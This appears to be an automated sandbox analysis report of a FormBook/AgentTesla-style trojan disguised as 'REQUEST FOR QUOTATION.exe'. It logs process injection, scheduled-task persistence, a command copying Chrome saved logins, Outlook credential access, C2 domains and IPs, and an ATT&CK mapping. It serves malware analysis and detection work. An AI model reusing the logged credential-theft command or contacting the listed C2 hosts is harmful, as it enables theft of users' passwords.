Source: C:\Windows\explorer.exe	Network Connect: 204.11.56.48 80
Source: C:\Windows\explorer.exe	Network Connect: 166.62.28.109 80

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\systray.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Thread register set: target process: 3424
Source: C:\Windows\SysWOW64\systray.exe	Thread register set: target process: 3424

Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Sample uses process hollowing technique

Show sources

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Section unmapped: C:\Windows\SysWOW64\systray.exe base address: DF0000

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JzXynzIhLqqy' /XML 'C:\Users\user\AppData\Local\Temp\tmp9ADB.tmp'
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Process created: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V

Source: explorer.exe, 00000006.00000002.922348566.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000006.00000000.671928815.0000000001080000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.923172682.00000000038C0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000002.934400453.0000000005E50000.00000004.00000001.sdmp, systray.exe, 00000008.00000002.923172682.00000000038C0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.671928815.0000000001080000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.923172682.00000000038C0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.671928815.0000000001080000.00000002.00000001.sdmp, systray.exe, 00000008.00000002.923172682.00000000038C0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.688769754.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Queries volume information: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe VolumeInformation
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\systray.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\SysWOW64\systray.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000005.00000002.711165019.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.711261795.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.922843352.0000000003220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.667885157.0000000004259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.708917355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.922231551.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.REQUEST FOR QUOTATION.exe.439e310.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.REQUEST FOR QUOTATION.exe.43f3530.2.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection512	Rootkit1	OS Credential Dumping1	Security Software Discovery331	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Masquerading1	Credential API Hooking1	Virtualization/Sandbox Evasion4	Remote Desktop Protocol	Credential API Hooking1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion4	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Disable or Modify Tools1	NTDS	Remote System Discovery1	Distributed Component Object Model	Data from Local System1	Scheduled Transfer	Application Layer Protocol113	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection512	LSA Secrets	File and Directory Discovery2	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Information Discovery113	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information3	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
REQUEST FOR QUOTATION.exe	29%	Virustotal		Browse
REQUEST FOR QUOTATION.exe	15%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
REQUEST FOR QUOTATION.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\JzXynzIhLqqy.exe	15%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.REQUEST FOR QUOTATION.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://i2.cdn-image.com/__media__/pics/12471/logo.png)	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2	0%	Avira URL Cloud	safe
http://www.internationalsoccerteams.com/display.cfm	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/pics/12471/libg.png)	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b	0%	Avira URL Cloud	safe
http://www.premiumnetworkstore.com/xxg/	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.internationalsoccerteams.com/Top_10_Luxury_Cars.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxT	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.internationalsoccerteams.com/Free_Credit_Report.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxT	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)	0%	Avira URL Cloud	safe
http://www.internationalsoccerteams.com/xxg/	0%	Avira URL Cloud	safe
http://www.internationalsoccerteams.com/__media__/js/trademark.php?d=internationalsoccerteams.com&ty	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff	0%	Avira URL Cloud	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.internationalsoccerteams.com/Best_Mortgage_Rates.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Blx	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff	0%	Avira URL Cloud	safe
http://www.internationalsoccerteams.com/10_Best_Mutual_Funds.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Bl	0%	Avira URL Cloud	safe
http://www.internationalsoccerteams.com/px.js?ch=2	0%	Avira URL Cloud	safe
http://www.internationalsoccerteams.com/px.js?ch=1	0%	Avira URL Cloud	safe
http://www.internationalsoccerteams.com/Cheap_Air_Tickets.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxTH	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/pics/12471/arrow.png)	0%	Avira URL Cloud	safe
http://www.internationalsoccerteams.com/Migraine_Pain_Relief.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Bl	0%	Avira URL Cloud	safe
www.entrustedhomeinspections.com/xxg/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.internationalsoccerteams.com/sk-logabpstatus.php?a=UXhYSEV0T2dld2lXQUFVUld2WTU5ZWZmL2YvN0	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://i2.cdn-image.com/__media__/pics/12471/libgh.png)	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.internationalsoccerteams.com/Anti_Wrinkle_Creams.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Blx	0%	Avira URL Cloud	safe
http://www.internationalsoccerteams.com	0%	Avira URL Cloud	safe
http://www.internationalsoccerteams.com/xxg/?GlW8J=aA1qKSLvfeXFRK5jYjV15J5OuKIkpVnYprgTABFHZ	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/js/min.js?v2.2	0%	Avira URL Cloud	safe
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
premiumnetworkstore.com	166.62.28.109	true	true	unknown
www.internationalsoccerteams.com	204.11.56.48	true	true	unknown
www.kenapa5-and.com	unknown	unknown	true	unknown
www.premiumnetworkstore.com	unknown	unknown	true	unknown
www.stickleyrep.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.premiumnetworkstore.com/xxg/	true	Avira URL Cloud: safe	unknown
http://www.internationalsoccerteams.com/xxg/	true	Avira URL Cloud: safe	unknown
www.entrustedhomeinspections.com/xxg/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://i2.cdn-image.com/__media__/pics/12471/logo.png)	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=16	systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false		high
http://i2.cdn-image.com/__media__/pics/12471/search-icon.png)	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.internationalsoccerteams.com/display.cfm	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false		high
http://i2.cdn-image.com/__media__/pics/12471/libg.png)	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false		high
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.internationalsoccerteams.com/Top_10_Luxury_Cars.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxT	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	false		high
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.internationalsoccerteams.com/Free_Credit_Report.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxT	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	false		high
http://i2.cdn-image.com/__media__/pics/12471/kwbg.jpg)	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.internationalsoccerteams.com/__media__/js/trademark.php?d=internationalsoccerteams.com&ty	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1	systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	explorer.exe, 00000006.00000000.673000917.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.networksolutions.com/cgi-bin/promo/domain-search?domainNames=internationalsoccerteams.co	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false		high
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	REQUEST FOR QUOTATION.exe, 00000001.00000002.667409214.0000000003251000.00000004.00000001.sdmp	false		high
http://www.internationalsoccerteams.com/Best_Mortgage_Rates.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Blx	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sakkal.com	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.internationalsoccerteams.com/10_Best_Mutual_Funds.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Bl	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.internationalsoccerteams.com/px.js?ch=2	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094	systray.exe, 00000008.00000003.716470662.00000000033EB000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000006.00000000.694907068.000000000B976000.00000002.00000001.sdmp	false		high
http://www.internationalsoccerteams.com/px.js?ch=1	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.internationalsoccerteams.com/Cheap_Air_Tickets.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2BlxTH	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/de-ch/?ocid=iehpLMEMh0	systray.exe, 00000008.00000003.714105355.00000000033E7000.00000004.00000001.sdmp	false		high
http://i2.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://i2.cdn-image.com/__media__/pics/12471/arrow.png)	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.internationalsoccerteams.com/Migraine_Pain_Relief.cfm?fp=HBrJhNXyq0Jwh2YLfsOIuJSubXjP%2Bl	systray.exe, 00000008.00000002.924568277.0000000005BAF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
